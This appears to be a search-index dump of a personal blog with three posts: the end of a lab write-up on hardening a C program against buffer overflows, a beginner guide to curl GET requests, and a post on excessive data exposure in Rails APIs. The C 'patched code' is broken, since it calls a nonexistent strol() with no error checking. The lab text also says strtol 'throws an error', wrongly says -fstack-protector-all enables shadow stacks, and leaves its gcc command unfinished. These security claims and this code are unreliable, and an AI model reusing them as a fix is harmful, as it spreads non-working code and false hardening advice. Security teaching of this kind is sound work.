inputs two different strings as input, the door would open. This vulnerability exists because we are using atoi(). To fix this vulnerability, we replaced the atoi() function with the strtol() function, which will throw an error if the input isn\u0026rsquo;t a valid number, as shown in the patched code below.\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; #include \u0026#34;action_functions.h\u0026#34; #include \u0026#34;validation_functions.h\u0026#34; int main(int argc, char * argv[]) { int check; int in0; int in1; if (argc == 3) { check = validate(argv); if (check == 0) { puts(\u0026#34;\\nChecking values\u0026#34;); // Use strtol with error checking since atoi is deprecatted in0 = strol(argv[2]); in1 = strol(argv[1]); check = fnchck(in1, in0); if (check == 0xf) { fngrt(); } else { fnr(); } } else { fnr(); } check = 0; } else { puts(\u0026#34;Usage : client \u0026lt;chiffre0\u0026gt; \u0026lt;chiffre1\u0026gt;\u0026#34;); check = 1; } return check; } How to avoid these mistakes in future. # The vulnerabilities identified and addressed in the source code highlight some of the security concerns we can introduce to our code. Below is a detailed plan of future the software development process to mitigate such mistakes before the code is released:\nUse Secure Coding Practices\nAlways validate and sanitize user input to prevent unexpected behavior. Use safer alternatives like fgets instead of gets or scanf to avoid buffer overflows. Dynamically allocate memory using malloc only when necessary. Always check for successful allocation using malloc or calloc and free the memory after use to prevent memory leaks in the code. Ensure Code Review and Auditing\nPeer review all new code for adherence to security guidelines. Use static analysis tools (e.g., SonarQube, Coverity) to identify vulnerabilities such as buffer overflows or use of unsafe functions. Periodically review older code to find unused functions, insecure patterns, and deprecated APIs, functions and dependencies and update them to the recommended functions. Remove unused functions or ensure they are excluded from compilation (e.g., through macros using ifdef). Enable Compiler Flags for Security\nUse flags like -D_FORTIFY_SOURCE=2 to add runtime checks for common string format vulnerabilities. Employ -DIGNORE_FUNCTION to exclude unused functions from the build. Use -fstack-protector-all flag to enables stack protection, including shadow stacks, for all functions. Use Linker Flags\nTo ensure the stack is non-executable (a key part of preventing exploit execution), you should also link with the -z noexecstack flag to mark the stack as non-executable using gcc -o my_program my_program.c -fstack-protector-all -fcf-protection - D Conclusion # This lab focused on enhancing the security of a C program by identifying and mitigating potential vulnerabilities using static code analysis and compiler/linker options. Through the use of cppcheck, we identified issues such as unsafe scanf() usage and variable scope problems. Additionally, we explored vulnerable compiler and linker options that could make the program susceptible to attacks like buffer overflows and memory corruption.\nBy applying secure coding practices and adjusting compilation settings, such as enabling stack protection, disabling executable stacks, and using modern C standards, we significantly improved the program’s security posture. We also addressed the buffer overflow vulnerability by replacing unsafe functions with safer alternatives like fgets() and dynamically allocating memory with proper bounds checks.\nThese enhancements not only mitigate common attack vectors but also enforce better coding standards and runtime safety, making the program more resilient to exploitation. Through this process, we reinforced the importance of secure programming practices, both in code and in the compilation process, to protect against malicious exploits.\nAdditionally, we found that the differences between the compared binaries of the two programs did not seem to be related to how the program was compiled. This led us to think that the source code might have been altered in some way, and may not have been identical to start with. However, it is also reasonable to consider that Ghidra’s interpretation of a binary file could vary, potentially influencing how the differences were observed.\nWe also had the opportunity to explore different compiler options in depth, particularly by utilizing the checksec function (from the manual). This provided valuable insights into various security features enabled or disabled by the compiler and further emphasized the importance of thoroughly reading the manual to understand the implications of different compiler flags. Understanding these options allows developers to make informed decisions about which security measures to apply during the compilation process, enhancing the overall security of the program.\n","date":"1 December 2024","permalink":"/njeri/posts/buffer_overflow_c/","section":"Posts","summary":"Introduction # The objective of this lab is to build on our understanding of secure programming in C by analyzing, enhancing, and securing the functionality of the program from Project Lab 1, with a focus on identifying and mitigating vulnerabilities and improving resilience against attacks like fuzzing.\nThis lab focuses on identifying vulnerabilities in the source code, applying and validating patches, and proposing future best practices to prevent similar issues. Additionally, we will analyze the code using security analysis tools (cppcheck) to find out about the vulnerabilities in code. After compiling the project, we will inspect the resulting binary in Ghidra to identify similarities and differences, which will further inform our understanding of the program\u0026rsquo;s security and allow us to apply effective mitigations.","title":"Secure Programming in C: Buffer Overwrites and Overflows"},{"content":"","date":"16 September 2023","permalink":"/njeri/tags/getting-started/","section":"Tags","summary":"","title":"Getting Started"},{"content":"Getting Started With GET Curl Commands # Introduction to curl # A curl command is a tool used on the terminal to make network requests using various protocols. curl is designed to aid with the data transfer to and from a server without the need for a web browser. With curl ,you can upload or download files, send requests to API endpoints to simulate user interaction from the terminal using a supported protocol such as HTTPs, FTP, and more.\nExplanation of GET requests\nWebpages display content to the end-user by requesting for resources from the server.These requests are commonly made using a GET HTTP request, often accompanied by query parameters when necessary.\nThis guide shows you how to run GET requests using a curl commands on the terminal.\nPrerequisites\nA Mac, Windows or Linux laptop Access to the terminal Have curl installed in your machine. To verify that curl is installed by run the command curl --version on the terminal. If properly installed, it will output the curl version installed.\nSending GET Requests with Curl # The GET command in curl is used to perform a GET request to the specified URL and retrieve user content from the server. The basic syntax for GET commands is as follows: curl [OPTIONS] [URL] [OPTIONS] - curl parameters such as -o to specify where to save the output.\n[URL] - specify the URL or sequence of URLs you want to make a request to.\nThe curl request below performa a GET HTTTP request and fetches the content on the specified URL then prints the response body on the terminal\ncurl https://documentwrite.dev/\nUsage # Downloading an image using curl\nTo download this image, https://documentwrite.dev/wp-content/uploads/2021/08/document-write-logo.png, using curl, you will follow the following steps on your terminal:\nOpen the terminal or command prompt. Navigate to the path you want to save the image. In this case the pictures directory using the command cd pictures Run the following command to command to download the image: curl -o logo.png https://documentwrite.dev/wp-content/uploads/2021/08/document-write-logo.png The command above does the following: -o logo.png ****specifies the name of the file where to save the output of the response.\nhttps://documentwrite.dev/wp-content/uploads/2021/08/document-write-logo.png is the url of the logo you want to download.\nCheck that the image file is downloaded successfully to the pictures folder.\nConclusion # In this guide, we learned about curl and how to use the GET curl command to download an image from a URL. Curl is a powerful tool that can be used for various data transfer tasks, and its simplicity makes it accessible even to non-coders.\nRemember to adjust the command and URL according to your specific use case.\n","date":"16 September 2023","permalink":"/njeri/posts/get_curl_commands/","section":"Posts","summary":"Getting Started With GET Curl Commands # Introduction to curl # A curl command is a tool used on the terminal to make network requests using various protocols. curl is designed to aid with the data transfer to and from a server without the need for a web browser. With curl ,you can upload or download files, send requests to API endpoints to simulate user interaction from the terminal using a supported protocol such as HTTPs, FTP, and more.\nExplanation of GET requests\nWebpages display content to the end-user by requesting for resources from the server.These requests are commonly made using a GET HTTP request, often accompanied by query parameters when necessary.","title":"Getting Started With GET Curl Commands"},{"content":"For software engineers, it may be easy to assume that no hacker would target our app since it isn’t big or well known. This attitude can lead to recklessness and lower measures for securing data on an app. However, it’s important to remember that data collected by an organization is very valuable. There can also be legal consequences in terms of lawsuits against the business that ensue from leakage of a user’s personally identifiable information (PII).\nWhat Is Excessive Data Exposure? # Excessive data exposure occurs when an API response returns more data than the client needs. As a rule of thumb, if a client application needs three fields, for example, you shouldn’t return the whole object. Excessive data exposure is a big API security concern that should be at the top of every engineer’s mind when designing APIs. In this post, you’ll learn about excessive data exposure in Ruby on Rails. By the end of the post, you’ll have learned about the following topics:\nLevels of data sensitivity Examples of excessive data exposure in Ruby on Rails Excessive data exposure prevention measures Levels of Data Sensitivity # Once data has been obtained from users, it’s classified according to its sensitivity in terms of the effects it could have on an organization if altered or stolen by a third party. In this section, you’ll learn about the four levels into which you should classify your data.\nPublic: This is data that poses no security threat when presented to the general public. This includes data such as workers’ directories, password validation prompts, etc. Internal: This is internal data that is used within the organization and would be harmful if exposed to people outside the organization. An example is email correspondence that doesn’t contain confidential information. Sensitive: This is data that belongs to users in an organization and is highly confidential. Examples are credit card information, social security numbers, API keys, access tokens, etc. Restricted: This is data that only a few members of an organization have access to, such as highly classified business information. Now that you’ve learned about the different tiers of data sensitivity, in the section below, we’ll take a look at a sample API response in order to learn more about excessive data exposure. Sample API Response # For this example, let’s say a gaming application API that shows a user’s profile may return a raw user object that looks like the code snippet below to the client application:\n{ \u0026ldquo;id\u0026rdquo;: 34, \u0026ldquo;username\u0026rdquo;: \u0026ldquo;trojan\u0026rdquo;, \u0026ldquo;level\u0026rdquo;: 7, \u0026ldquo;location\u0026rdquo;: \u0026ldquo;Nairobi,Kenya\u0026rdquo;, \u0026ldquo;phone_no\u0026rdquo;: \u0026ldquo;+254678543110\u0026rdquo;, \u0026ldquo;bio\u0026rdquo;: \u0026ldquo;Kenyan gamer\u0026rdquo;, \u0026ldquo;address\u0026rdquo;: \u0026ldquo;Corner Street, Karen, house 24\u0026rdquo;, \u0026ldquo;access_token\u0026rdquo;: \u0026ldquo;FLWSECK_TEST-917984d85944319929e4280429ce5523-X\u0026rdquo; } At first glance, you may not notice anything wrong with the API response above. But you\u0026rsquo;ll see in the next section how returning this kind of raw data can lead to excessive data exposure in your Rails application.\nExamples of Excessive Data Exposure # The API response above leads to excessive data exposure in the following ways.\nReturning Unfiltered Data # The API response above returns raw unfiltered data, leaving the client app to filter out sensitive information about the user. The client application only needs the username, bio, and level fields, making the extra fields that are returned useless. In this instance, returning more data than the client application needs is a case of excessive data exposure. If a hacker were to intercept this API response, they could view all the sensitive data and, worse, make a copy of the data and sell it on the dark web.\nUsing Auto-Incrementing Primary Keys # A Postgres database, by default, uses auto-incrementing primary keys unless otherwise specified. Since the primary keys are sent with the URL as an ID, anyone sniffing the website traffic could access the ID, which would be a sequentially incrementing integer. It lets the third party know the order of magnitude of a database. For example, if the API to get a user’s data is /user/1870, they know that your database has stored data for a couple of thousand users.\nReturning Personally Identifiable Information in an API Response # PII is any data that can be used to identify a person and is never shown on a website or mobile app. PII includes the ID number, email, credit card details, social security number, home address, driver’s license, etc. of a person. Returning PII in an API response is a big data breach and a case of excessive data exposure. If hackers gain access to PII, this could result in lawsuits from the users when discovered, which could then lead a small company to bankruptcy. API security is extremely important for both the company and its users. You’ve seen instances of excessive data exposure and how API design flows lead to security vulnerabilities. Therefore, in the next section, let’s now learn about preventive measures.\nProtective Measures # Listed below are some of the ways you can protect your Rails application against excessive data exposure.\nDon’t Use Auto-Incrementing Primary Keys # Since primary keys are publicly discoverable in the URLs and network logs as ID values, it’s better to use universally unique identifiers (UUIDs). UUIDs are random and unique, and nobody can guess the order of magnitude of your database.\nImplement Server Authorization Checks # Use the CanCanCan authorization gem. It defines access rules that restrict someone from viewing somebody else’s record by changing the ID in the URL. The user cannot change the ID in the URL to view another user’s profile data unless authorized.\nUse Data Masking # Data masking is used to hide sensitive information in your database, like a user’s email, and only display the nonsensitive information in an API response.\nEncrypt Your Data # If your app must store personally identifiable information, it should all be encrypted. Encryption protects all sensitive information from prying eyes. With encryption, even if an attacker got a snapshot of your database or API response, they wouldn’t be able to make sense of the data.\nUse Hashing # Use hashing to secure the databases that contain PII\nDon’t Return a Raw Unfiltered API Response # When designing APIs, use the principle of least privilege by only returning the data a user needs. Returning raw unfiltered data to a mobile or web application is never a good idea. Examine every API response, and filter out the data the user doesn’t need on the server before it’s presented to the client.\nDon’t Store Sensitive PII Data # Use a third party to store sensitive data. For example, for all credit card details, you should store them in a third party like Stripe. In this scenario, under no circumstances will the credit card details show up in any API request since you don’t store them in your own database. You should evaluate whether your APIs are secure from what you’ve learned in this article. And if they’re not, you should consider using some of the preventive measures stated above.\nConclusion # In this post, you learned what excessive data exposure is, the levels of data sensitivity, and examples of how you could contribute to excessive data exposure when designing your Rails APIs. Finally, you learned about the measures you need to put in place to prevent excessive data exposure. Data is a very important asset to any company that should be protected at all costs. Ensuring your users’ data is secure protects your company from losses emanating from lawsuits and protects the company image. In the case of API requests, you shouldn’t return all the fields stored in the database by default. Data security helps customers trust your business with their data.\n","date":"18 May 2022","permalink":"/njeri/posts/rails_excessive_data_exposure/","section":"Posts","summary":"For software engineers, it may be easy to assume that no hacker would target our app since it isn’t big or well known. This attitude can lead to recklessness and lower measures for securing data on an app. However, it’s important to remember that data collected by an organization is very valuable. There can also be legal consequences in terms of lawsuits against the business that ensue from leakage of a user’s personally identifiable information (PII).\nWhat Is Excessive Data Exposure? # Excessive data exposure occurs when an API response returns more data than the client needs. As a rule of thumb, if a client application needs three fields, for example, you shouldn’t return the whole object.","title":"Rails Excessive Data Exposure"}]